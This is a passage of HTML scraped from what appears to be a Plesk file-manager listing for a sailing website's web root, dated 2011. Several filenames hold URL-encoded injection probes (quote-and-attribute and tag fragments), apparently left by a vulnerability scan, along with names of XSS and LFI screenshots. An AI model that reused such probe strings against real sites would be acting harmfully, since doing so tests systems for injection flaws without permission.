onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25202d0878db96d" onClick="return bin();;lon();">%20a%3db%202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%20c23f52e7ba1" value="%20a%3db%20c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%2520c23f52e7ba1" onClick="return bin();;lon();">%20a%3db%20c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%20c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%2520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%2520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_064a7066601" value="064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=064a7066601" onClick="return bin();;lon();">064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPG" value="1-lfi-mod.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=1-lfi-mod.JPG" onClick=";lon();">1-lfi-mod.JPG</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1-lfi-mod.JPGfdf080d99066333a3eca3950" value="1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick="return bin();;lon();">1-lfi-mod.JPGfdf080d99066333a3eca3950</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1-lfi-mod.JPGfdf080d99066333a3eca3950" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1-lfi-mod.JPGfdf080d99066333a3eca3950" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_1dac1%2522a%253d%2522b%2522064a7066601" value="1dac1%2522a%253d%2522b%2522064a7066601" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick="return bin();;lon();">1dac1%2522a%253d%2522b%2522064a7066601</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/1dac1%2522a%253d%2522b%2522064a7066601" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F1dac1%252522a%25253d%252522b%252522064a7066601" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=1dac1%252522a%25253d%252522b%252522064a7066601" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_25e31e30568" value="25e31e30568" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=25e31e30568" onClick="return bin();;lon();">25e31e30568</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/25e31e30568" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=25e31e30568" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F25e31e30568" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=25e31e30568" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2a790%253ca%253e05dd7ec7ca9" value="2a790%253ca%253e05dd7ec7ca9" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick="return bin();;lon();">2a790%253ca%253e05dd7ec7ca9</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/2a790%253ca%253e05dd7ec7ca9" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2a790%25253ca%25253e05dd7ec7ca9" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2a790%25253ca%25253e05dd7ec7ca9" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_2ef80%2522%2520a%253db%2520c23f52e7ba1" value="2ef80%2522%2520a%253db%2520c23f52e7ba1" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick="return bin();;lon();">2ef80%2522%2520a%253db%2520c23f52e7ba1</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/2ef80%2522%2520a%253db%2520c23f52e7ba1" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F2ef80%252522%252520a%25253db%252520c23f52e7ba1" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=2ef80%252522%252520a%25253db%252520c23f52e7ba1" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpg" value="302br.net-xss-2.jpg" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=302br.net-xss-2.jpg" onClick=";lon();">302br.net-xss-2.jpg</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpg" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpg" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" value="302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick="return bin();;lon();">302br.net-xss-2.jpgfdf080d93392bd957db5b4d5</a></td><td class="number">65.0&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=302br.net-xss-2.jpgfdf080d93392bd957db5b4d5" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3e50b%2522%253e%253ca%253e8f0ee00628" value="3e50b%2522%253e%253ca%253e8f0ee00628" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick="return bin();;lon();">3e50b%2522%253e%253ca%253e8f0ee00628</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:09 PM</td><td><A href="http://nosedivesailing.com/3e50b%2522%253e%253ca%253e8f0ee00628" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3e50b%252522%25253e%25253ca%25253e8f0ee00628" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3e50b%252522%25253e%25253ca%25253e8f0ee00628" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPG" value="3M.COM-XSS-1.JPG" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="f(event, &#039;image&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_image.gif" width="16" height="16" alt="file_image.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=show&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();">3M.COM-XSS-1.JPG</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPG" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPGfdf080d921773c427dce8684" value="3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" 